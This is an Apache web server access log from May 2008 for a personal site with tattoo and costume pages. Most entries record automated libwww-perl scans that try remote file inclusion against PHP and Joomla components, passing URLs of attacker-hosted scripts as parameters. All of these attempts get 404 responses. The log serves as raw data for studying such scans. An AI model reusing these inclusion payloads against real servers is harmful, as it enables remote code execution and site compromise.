206.212.247.135 - - [29/May/2008:14:29:08 -0500] "GET /logs//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:14:29:08 -0500] "GET //errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
202.181.99.12 - - [29/May/2008:14:29:33 -0500] "GET /logs//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:14:29:33 -0500] "GET //errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.198.106.61 - - [29/May/2008:14:32:08 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
213.198.106.61 - - [29/May/2008:14:32:08 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
213.198.106.61 - - [29/May/2008:14:32:09 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
74.86.101.159 - - [29/May/2008:14:34:55 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
74.86.101.159 - - [29/May/2008:14:34:56 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
213.246.42.59 - - [29/May/2008:14:39:23 -0500] "GET /logs/access_log.1181952000/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
213.246.42.59 - - [29/May/2008:14:39:23 -0500] "GET /newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
213.246.42.59 - - [29/May/2008:14:39:23 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
213.246.42.59 - - [29/May/2008:14:39:24 -0500] "GET /logs/access_log.1207180800/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
62.112.193.46 - - [29/May/2008:14:39:42 -0500] "GET /logs/access_log.1207785600/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:14:39:42 -0500] "GET /newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:14:39:43 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:14:40:12 -0500] "GET /logs/access_log.1207180800/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
70.84.106.68 - - [29/May/2008:14:40:46 -0500] "GET /logs/access_log.1207785600/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.810"
70.84.106.68 - - [29/May/2008:14:40:46 -0500] "GET /newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
70.84.106.68 - - [29/May/2008:14:40:46 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
70.84.106.68 - - [29/May/2008:14:41:13 -0500] "GET /logs/access_log.1181952000/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.810"
86.52.82.192 - - [29/May/2008:14:46:17 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
66.249.70.213 - - [29/May/2008:14:46:56 -0500] "GET /logs/access_log.1205280000 HTTP/1.1" 200 427922 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.76.116.20 - - [29/May/2008:14:49:36 -0500] "GET /logs/access_log.1207785600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 371 "-""libwww-perl/5.810"
62.76.116.20 - - [29/May/2008:14:49:37 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
62.76.116.20 - - [29/May/2008:14:49:37 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
65.55.208.124 - - [29/May/2008:14:50:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [29/May/2008:14:50:09 -0500] "GET /logs/?S=D HTTP/1.1" 200 85400 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
213.198.106.61 - - [29/May/2008:14:50:28 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
213.198.106.61 - - [29/May/2008:14:50:29 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
213.198.106.61 - - [29/May/2008:14:50:29 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
65.214.45.147 - - [29/May/2008:14:55:07 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.45.147 - - [29/May/2008:14:55:08 -0500] "GET /logs/access_log.1177718400 HTTP/1.0" 200 164681 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
218.150.78.76 - - [29/May/2008:14:59:17 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
218.150.78.76 - - [29/May/2008:14:59:18 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
86.52.82.192 - - [29/May/2008:15:00:13 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
206.212.247.135 - - [29/May/2008:15:03:08 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:03:08 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.198.106.61 - - [29/May/2008:15:03:50 -0500] "GET /logs/access_log.1207180800//tools/send_reminders.php?noSet=0&includedir=http://nozyk.org/rob.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
213.198.106.61 - - [29/May/2008:15:03:51 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://nozyk.org/rob.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
213.198.106.61 - - [29/May/2008:15:03:51 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://nozyk.org/rob.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
218.150.78.76 - - [29/May/2008:15:04:29 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
218.150.78.76 - - [29/May/2008:15:04:30 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.59.145.196 - - [29/May/2008:15:06:06 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
200.59.145.196 - - [29/May/2008:15:06:06 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
200.135.11.22 - - [29/May/2008:15:13:50 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 294 "-""libwww-perl/5.803"
200.135.11.22 - - [29/May/2008:15:13:50 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 289 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:14:06 -0500] "GET /logs/access_log.1207180800//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:14:06 -0500] "GET //errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:14:06 -0500] "GET /logs//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
218.94.38.182 - - [29/May/2008:15:14:47 -0500] "GET /logs/access_log.1207785600/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 388 "-""libwww-perl/5.65"
218.94.38.182 - - [29/May/2008:15:15:02 -0500] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 361 "-""libwww-perl/5.65"
218.94.38.182 - - [29/May/2008:15:15:07 -0500] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 366 "-""libwww-perl/5.65"
202.181.99.12 - - [29/May/2008:15:15:35 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:15:15:36 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.167.156.20 - - [29/May/2008:15:20:14 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
216.167.156.20 - - [29/May/2008:15:20:15 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
62.112.193.46 - - [29/May/2008:15:20:21 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:15:20:21 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:15:20:22 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.70.219.20 - - [29/May/2008:15:24:05 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Tattoo_flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
65.70.219.20 - - [29/May/2008:15:24:06 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
65.70.219.20 - - [29/May/2008:15:24:08 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
65.70.219.20 - - [29/May/2008:15:24:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
66.163.197.88 - - [29/May/2008:15:24:10 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
66.163.197.88 - - [29/May/2008:15:24:11 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
66.163.197.88 - - [29/May/2008:15:24:11 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
195.209.236.71 - - [29/May/2008:15:24:15 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.209.236.71 - - [29/May/2008:15:24:16 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.209.236.71 - - [29/May/2008:15:24:16 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
84.19.176.172 - - [29/May/2008:15:24:21 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
84.19.176.172 - - [29/May/2008:15:24:22 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
66.163.197.88 - - [29/May/2008:15:24:49 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
222.122.141.76 - - [29/May/2008:15:25:15 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
222.122.141.75 - - [29/May/2008:15:25:15 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
222.122.141.76 - - [29/May/2008:15:25:15 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
222.122.141.75 - - [29/May/2008:15:25:15 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
222.122.141.76 - - [29/May/2008:15:25:15 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
222.122.141.75 - - [29/May/2008:15:25:15 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
222.122.141.72 - - [29/May/2008:15:25:58 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
222.122.141.72 - - [29/May/2008:15:25:58 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
222.122.141.72 - - [29/May/2008:15:25:59 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
222.122.141.74 - - [29/May/2008:15:26:03 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
222.122.141.74 - - [29/May/2008:15:26:03 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
222.122.141.74 - - [29/May/2008:15:26:04 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
222.122.141.75 - - [29/May/2008:15:26:50 -0500] "GET /logs/access_log.1207180800//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
222.122.141.76 - - [29/May/2008:15:27:06 -0500] "GET /logs/access_log.1207180800//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
222.122.141.74 - - [29/May/2008:15:27:37 -0500] "GET /logs/access_log.1207180800//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
222.122.141.72 - - [29/May/2008:15:27:40 -0500] "GET /logs/access_log.1207180800//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
202.181.99.12 - - [29/May/2008:15:28:28 -0500] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:15:28:29 -0500] "GET ///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
63.227.137.123 - - [29/May/2008:15:29:39 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://www.google.com/search?q=1400%27s+Spanish+Moorish+court+dress&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:29:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:29:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
206.212.247.135 - - [29/May/2008:15:30:26 -0500] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:30:26 -0500] "GET ///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
63.227.137.123 - - [29/May/2008:15:31:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
206.212.247.135 - - [29/May/2008:15:31:22 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:31:23 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
63.227.137.123 - - [29/May/2008:15:31:26 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3298 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:26 -0500] "GET /costume/costm37.jpg HTTP/1.1" 200 9819 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:26 -0500] "GET /costume/costm38.jpg HTTP/1.1" 200 9710 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:26 -0500] "GET /costume/costm39.jpg HTTP/1.1" 200 9800 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:26 -0500] "GET /costume/costm41.jpg HTTP/1.1" 200 9976 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:26 -0500] "GET /costume/costm40.jpg HTTP/1.1" 200 60324 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:26 -0500] "GET /costume/costm42.jpg HTTP/1.1" 200 9593 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:27 -0500] "GET /costume/costm43.jpg HTTP/1.1" 200 9745 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:27 -0500] "GET /costume/costm44.jpg HTTP/1.1" 200 9808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:27 -0500] "GET /costume/costm46.jpg HTTP/1.1" 200 9599 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:27 -0500] "GET /costume/costm45.jpg HTTP/1.1" 200 9735 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:27 -0500] "GET /costume/costm47.jpg HTTP/1.1" 200 9945 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
63.227.137.123 - - [29/May/2008:15:31:27 -0500] "GET /costume/costm48.jpg HTTP/1.1" 200 10085 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
202.181.99.12 - - [29/May/2008:15:31:29 -0500] "GET /logs/access_log.1207180800//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:15:31:29 -0500] "GET //errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:15:31:30 -0500] "GET /logs//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
206.212.247.135 - - [29/May/2008:15:31:38 -0500] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 367 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:31:38 -0500] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 362 "-""libwww-perl/5.803"
202.181.99.12 - - [29/May/2008:15:32:32 -0500] "GET /logs//include/livre_include.php?no_connect=lol&chem_absolu=http://infects1337.t35.com/TT??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:15:32:32 -0500] "GET //include/livre_include.php?no_connect=lol&chem_absolu=http://infects1337.t35.com/TT??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
218.150.78.76 - - [29/May/2008:15:33:07 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/Mic22.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
218.150.78.76 - - [29/May/2008:15:33:07 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/Mic22.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
218.150.78.76 - - [29/May/2008:15:33:07 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/Mic22.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.244.43.139 - - [29/May/2008:15:35:04 -0500] "GET /logs//data/faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.69"
212.244.43.139 - - [29/May/2008:15:35:04 -0500] "GET //data/faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.69"
200.71.194.211 - - [29/May/2008:15:38:53 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
200.71.194.211 - - [29/May/2008:15:38:57 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
200.71.194.211 - - [29/May/2008:15:39:00 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
202.181.99.12 - - [29/May/2008:15:40:43 -0500] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:15:40:43 -0500] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:15:40:48 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:15:40:48 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
216.167.156.20 - - [29/May/2008:15:43:17 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 355 "-""libwww-perl/5.65"
